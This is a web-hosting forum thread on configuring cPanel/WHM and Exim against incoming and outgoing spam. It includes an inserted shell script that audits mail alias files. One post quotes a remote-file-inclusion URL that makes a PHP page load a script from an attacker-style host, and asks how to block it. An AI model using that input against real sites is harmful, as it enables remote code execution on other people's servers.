The Community Forums


SPAM PROTECTION: Guide

Discussion in 'General Discussion' started by Secret Agent, Jan 13, 2006.

  1. Secret Agent

    Secret Agent Guest

    Ok, I'm not actually creating a guide here but more (for the sake of everyone who needs one and reads this) asking for everyone to chip in with some advice / tips on spam prevention on the server. Below are some off the top of my head. Please reply with your tips and I will edit and add them. I apologize if others may have created this, but it would be nice to compile it into one large guide.


    Exim Dictionary Attack ACL: (by Chirpy)
    http://www.configserver.com/free/eximdeny.html

    WHM > Exim Config
    (enable all)

    Always set the Sender: header when the sender is changed from the actual sender.
    Verify the existence of email senders.
    Use callouts to verify the existence of email senders.
    Discard emails for users who have exceeded their quota instead of keeping them in the queue

    WHM > Tweak Settings
    (enable all these)

    BoxTrapper Spam Trap
    Include a list of Pop before SMTP senders in the X-PopBeforeSMTP header when relaying mail
    Silently Discard all FormMail-clone requests with a bcc
    SpamAssassin
    SpamAssassin Spam Box delivery
    The maximum each domain can send out per hour (reasonable number, say 50)
    Track the origin of messages sent through the mail server by adding the X-Source headers
    Default catch-all/default address behavior for new accounts (fail)
    Attempt to prevent pop3 connection floods (known to cause problems from my experience)
    Prevent users from parking/adding on common internet domains

    WHM > Tweak Security
    (enable SMTP tweak)

    WHM > Addon Modules
    (install)
    Spam Assassin
    ClamAV

    WHM > Server Manager
    Modify SMTP Port to 26 (will not work for a large number of ISP's who require you to use their SMTP server)

    Stop Receiving Spam with Cpanel
    http://www.webhostgear.com/index.php?art/id:299

    Stop PHP nobody Spammers
    http://www.webhostgear.com/index.php?art/id:232

    Stop Spam At The Server with Exim RBL
    http://www.webhostgear.com/index.php?art/id:175
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    You're mixing up incoming and outgoing spam prevention, which are completely different topics and require completely different solutions.

    For incoming spam:

    I would definitely not recommend the following at all, they will definitely exacerbate the problem. The first can break mail delivery. Using BoxTrapper has no value in a server-wide spam protection policy, will make the whole spam situation much, much worse and can very quickly get your server on RBLs:

    Always set the Sender: header when the sender is changed from the actual sender.
    BoxTrapper Spam Trap

    This one has no bearing on spam protection at all:

    Modify SMTP Port to 26 (will not work for a large number of ISP's who require you to use their SMTP server)

    You can also use third-party tools, such as MailScanner which many find indispensable :)

    http://www.configserver.com/free/mailscanner.html

    Other things to do:

    Regularly check /etc/valiases/* and ensure no-one is using :blackhole: and substitute :fail: if they are. Make sure accounts that don't need a catchall alias are changed to :fail:

    For outgoing spam:

    I would also not recommend this, as it will definitely break some aspects of using sendmail:

    http://www.webhostgear.com/index.php?art/id:232

    Much better is to use extended exim logging through the exim configuration editor:

    log_selector = +all

    The SMTP Tweak is of no value for incoming spam and won't work at all if you have your own iptables configuration script installed, e.g. APF. You would need to separately configure iptables yourself (see other threads) to achieve that protection.

    Dissuade people very strongly indeed from using Auto Responders - they're another good way to get your server in an RBL

    Secure your server. An obvious thing, but yet another topic all of its own.

    Investigate enabling phpsuexec wherever possible.

    Install a firewall with incoming and outgoing port filtering and without any holes in it - beware of default settings and online guides that often open huge holes in SPI firewalls unnecessarily.

    Make sure you're continually checking all your server logs for suspicious activity throughout every day of the week. Make sure you read all your logs (or use the help of an app to pare them down) and understand them and act immediately on anything wrong.

    Make sure you have root emails routed to your mailbox and that you read them.

    Make sure that, if you do not use phpsuexec, that you set nobody's email to a real email address that is checked by someone and never simply route it off to /dev/null - you can get vital warning of spammer activity by monitoring it.

    Use the nobody header rewrite tweak so that the return-path is set correctly if a From header is specified in outgoing emails.

    Make sure all the server log files are rotated properly.

    Install a md5sum checking application such as tripwire.

    Never sit on old OSes such as RH7.3/RH9/FC1/FC2/FC3 - all of those are now dead and you should not be running them. Upgrade to an enterprise OS that is going to receive OS updates for years to come.

    Beware of using custom kernels. If you do use them, make sure you monitor kernel.org and recompile regularly. If you use vendor kernels, make sure you keep them up to date.

    Keep cPanel up to date.

    Be aware of every script your clients are upgrading and using and that they're keeping them up to date.

    The list goes on. Good spam protection = good server management and an intimate knowledge of how a server works, how your server works, exactly what is installed on it and what needs to be done on it on a regular basis, is essential.

    Last, but not least, bearing that last paragraph in mind, if you don't understand, do some work on the web and find out how - or hire someone who does. Don't stick your head in the sand, or believe that you can have a dedicated server and not have or use the skills of a full-time server admin.
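    The /etc/valiases check chirpy describes above, written out as a small audit script. This is an added example, not code from the thread or from cPanel; it assumes the cPanel layout of one /etc/valiases/<domain> file per domain, with "address: target" lines and the catch-all written as "*: :blackhole:" or "*: :fail: ...". The sample files it builds are constructed in a temporary directory so it can be run without touching a live server; point find_blackholes at /etc/valiases to audit a real box, and only run fix_blackholes once you have reviewed the list.

```shell
#!/bin/sh
# Added example (not from the thread or cPanel): find valias files whose
# catch-all or aliases route mail to :blackhole:, and rewrite them to :fail:,
# which rejects the mail at SMTP time instead of silently accepting it.

# Build a constructed sample directory that mimics /etc/valiases and print its path.
# (Real cPanel files carry more entries; these are just the cases we care about.)
make_sample_valiases() {
    sample_dir=$(mktemp -d)
    # catch-all silently swallowing everything (the case chirpy warns about)
    printf '*: :blackhole:\n' > "$sample_dir/example.com"
    # a real alias plus a blackholed catch-all
    printf 'info@example.net: bob\n*: :blackhole:\n' > "$sample_dir/example.net"
    # already correct: unknown recipients are rejected
    printf '*: :fail: No such user here\n' > "$sample_dir/example.org"
    echo "$sample_dir"
}

# Print the path of every file under $1 that contains :blackhole: (one per line).
# grep -l exits 1 when nothing matches, so mask that for callers using set -e.
find_blackholes() {
    grep -l ':blackhole:' "$1"/* 2>/dev/null || true
}

# Print how many files under $1 still use :blackhole:.
count_blackholes() {
    find_blackholes "$1" | grep -c . || true
}

# Rewrite :blackhole: to :fail: in every affected file under $1 and print the
# number of files changed. Written via a temp file and mv so it works with any sed.
# Assumes paths without spaces (true for /etc/valiases/<domain>).
fix_blackholes() {
    changed=0
    for f in $(find_blackholes "$1"); do
        sed 's/:blackhole:/:fail: No such user here/' "$f" > "$f.tmp" && mv "$f.tmp" "$f"
        changed=$((changed + 1))
    done
    echo "$changed"
}

# Stand-alone run against the constructed sample: list, fix, list again.
demo_dir=$(make_sample_valiases)
echo "Before: $(count_blackholes "$demo_dir") file(s) using :blackhole:"
find_blackholes "$demo_dir"
echo "Fixed: $(fix_blackholes "$demo_dir") file(s)"
echo "After: $(count_blackholes "$demo_dir") file(s) using :blackhole:"
rm -rf "$demo_dir"
```

    The rewrite deliberately keeps every non-catch-all alias line untouched; only the :blackhole: target itself changes, so an existing alias such as info@example.net still delivers normally after the fix.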
     
  3. hpsmaster2

    hpsmaster2 Member

    Joined:
    Mar 1, 2005
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    Chirpy,

    How can I block this kind of injection with mod_security:

    http://customer.com/index.php?id=http://site-hacker.com/script.txt

    ?

    Thanks

     
  4. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    While the PHP Nobody article was effective back in the day, there are much better ways of dealing with this problem. As chirpy said, enabling extended logging is a must. Also you can do some very nice things with antivirus.exim as well as mod_security.
     
  5. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
  6. myweb

    myweb Well-Known Member

    Joined:
    Jun 18, 2002
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Tokyo
    Just one quick question.

    Does this mean that :blackhole: does not work as intended? I did have a user who was complaining of continuously receiving spam even with the :blackhole: setting, and was looking for a solution.
     
  7. GordonH

    GordonH Well-Known Member

    Joined:
    Sep 6, 2001
    Messages:
    104
    Likes Received:
    0
    Trophy Points:
    16
    Boxtrapper is bad news.
    Results in you getting lots of spam complaints if it is turned on.

    I am very cheeky and redirect all my spam assassin flagged mail to a Gmail account for later review (on my own email accounts).

    I also have the customers' server set to not have the default account active when an account is set up; otherwise they fill up with junk and we end up with three backup copies of the junk as well.

    My worst day for spam was 1.4m items delivered to my inbox.
    Yes, that's 1,400,000
    about a month ago.
    Most was filtered out, but after that weekend I did some serious tightening down.
     
  8. SonServers

    SonServers Well-Known Member

    Joined:
    Oct 24, 2001
    Messages:
    94
    Likes Received:
    0
    Trophy Points:
    6
    Chirpy,

    Could you point me toward a "how to" for: "Use the nobody header rewrite tweak so that the return-path is set correctly if a From header is specified in outgoing emails." I'm not finding any details on that.

    That would be great for those users that have PHP mailer emails lists so they would get their own bounces.

    Thanks!
     
  9. djblamire

    djblamire Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    250
    Likes Received:
    0
    Trophy Points:
    16
    I agree - This would be very useful,

    Thanks
    Daniel
     
  10. spaceman

    spaceman Well-Known Member

    Joined:
    Mar 25, 2002
    Messages:
    481
    Likes Received:
    0
    Trophy Points:
    16
    http://forums.cpanel.net/showthread.php?t=43258
     
  11. SonServers

    SonServers Well-Known Member

    Joined:
    Oct 24, 2001
    Messages:
    94
    Likes Received:
    0
    Trophy Points:
    6
    Thanks Spaceman. :)
     
  12. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    It does work as intended, it's just not the better option. :blackhole: and :fail: don't stop spam going to an existing pop3 or alias address.
     
  13. clintjohnson

    clintjohnson Registered

    Joined:
    Jun 11, 2007
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    nobody header rewrite tweak?

    What is the nobody header rewrite tweak?

    I want to disallow persons from setting the FROM header when using mail() in PHP.

    My goal is to make sure my settings in /var/cpanel/maxemails are honored on mail generated from PHP.

    Clint.
     
  14. kamus

    kamus Member

    Joined:
    Jul 31, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Chile
    Thanks, very useful :)
    :)
     